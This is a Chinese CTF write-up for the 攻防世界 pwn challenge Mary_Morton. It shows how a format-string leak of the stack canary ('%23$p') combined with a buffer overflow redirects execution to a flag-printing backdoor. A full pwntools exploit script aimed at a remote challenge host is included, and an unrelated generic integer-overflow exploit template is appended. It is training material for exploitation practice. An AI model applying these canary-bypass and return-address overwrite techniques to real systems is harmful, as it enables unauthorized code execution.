攻防世界 Pwn Mary_Morton

1.题目下载地址

点击下载题目

2.checksec看一下保护

在这里插入图片描述
开启了canary,没开PIE
大概率有后门函数,应该不是很难的题

3.IDA分析

3.1.main函数

 puts("Welcome to the battle ! ");
 puts("[Great Fairy] level pwned ");
 puts("Select your weapon ");
 while ( 1 )
 {
   while ( 1 )
   {
     sub_4009DA();
     __isoc99_scanf("%d", &v3);
     if ( v3 != 2 )
       break;
     sub_4008EB();
   }
   if ( v3 == 3 )
   {
     puts("Bye ");
     exit(0);
   }
   if ( v3 == 1 )
     sub_400960();
   else
     puts("Wrong!");
 }
}
  • 大概就是一个菜单,选择对应的号码就会进入对应的程序
  • 一个一个进去看

3.2. sub_400960()

unsigned __int64 sub_400960()
{
  char buf[136]; // [rsp+0h] [rbp-90h] BYREF
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(buf, 0, 0x80uLL);
  read(0, buf, 0x100uLL);
  printf("-> %s\n", buf);
  return __readfsqword(0x28u) ^ v2;
}
  • 这个函数的printf()指定了输出目标,不适合格式化字符串漏洞

3.3. sub_4008EB()

unsigned __int64 sub_4008EB()
{
 char buf[136]; // [rsp+0h] [rbp-90h] BYREF
 unsigned __int64 v2; // [rsp+88h] [rbp-8h]

 v2 = __readfsqword(0x28u);
 memset(buf, 0, 0x80uLL);
 read(0, buf, 0x7FuLL);
 printf(buf);
 return __readfsqword(0x28u) ^ v2;
}
  • 这个函数的printf()函数可以格式化字符串
  • 因为这个程序开了canary,并且没开PIE
  • 很明显是一道格式化字符串加canary绕过
  • 找一下后门函数

3.4.

int sub_4008DA()
{
  return system("/bin/cat ./flag");
}

在这里插入图片描述

4.gdb动态调试

4.1.计算溢出量

计算偏移的方法,很好用
在这里插入图片描述

  • 可以数到,我们输入后的偏移为6

  • 又因为,buf和v2本来的差距就有0x90-8h=0x88 0x88/0x8=0x11(十进制17)
    在这里插入图片描述

  • 根据注释:buf在rbp-90h,v2在rbp-8h,所以,覆盖返回地址的话,需要0x90-0x8=0x88覆盖局部变量,然后放上canary的值,在8个“a”覆盖ebp,最后加上system的返回地址就可以。

  • 计算器算一下
    在这里插入图片描述
    那么往后找23个位置就是canary了

5.exp

python2写法

from pwn import *
 
# context.log_level = 'debug'
p = remote('111.198.29.45',56161)
 
p.recvuntil("Exit the battle ")
p.sendline(str(2))#先进入格式化函数泄漏cannary
p.sendline("%23$p")#泄漏cannary
p.recvuntil("0x")
canary = int(p.recv(16),16)#接收16个字节
 
p.recvuntil("Exit the battle ")
payload = "a"*0x88 + p64(canary) + 0x8*"a" + p64(0x04008DA)
p.sendline(str(1))
p.sendline(payload)
p.interactive()
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在栈溢出风险[^2]。 对于这类问题的一个常见解决方法涉及以下几个方面: #### 分析目标程序 使用反汇编工具IDA可以深入分析二进制文件的工作原理。通过将题目中的可执行文件加载至IDA中并检查其主要逻辑流程,能够识别潜在的安全缺陷位置。特别是要注意那些未启用安全防护机制(如stack canary)的情况,在Ubuntu环境下测试可以帮助确认这一点。 #### 构造有效载荷(Payload) 基于发现的漏洞特性来构建特定的有效载荷是非常重要的一步。例如,在某些情况下,可以通过向缓冲区填充足够的数据直到覆盖返回地址,并指向一个已知地址处的gadget链或直接调用系统函数实现控制流劫持的目的。Python库`pwntools`提供了便捷的方法用于创建这样的payloads,并且支持本地调试和远程连接服务器提交攻击尝试[^3]。 ```python from pwn import * # 设置目标IP和端口 target_ip = "example.com" port_num = 12345 # 创建远程连接对象 io = remote(target_ip, port_num) # 定义payload结构 offset_to_ret_addr = ... # 需要根据实际情况调整偏移量大小 rop_chain_or_function_ptr = ... payload = b'A' * offset_to_ret_addr + pack(rop_chain_or_function_ptr) # 发送payload给服务端 io.sendlineafter(b"prompt:", payload) ``` 请注意上述代码片段仅为模板示意;实际操作前需依据具体情况进行适当修改以适应不同场景下的需求。 #### 测试与验证 完成以上准备工作之后,应当在一个受控环境中反复试验所设计出来的exploit直至成功获取shell或其他预期效果为止。同时也要注意遵守比赛规则和服务条款,确保行为合法合规[^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值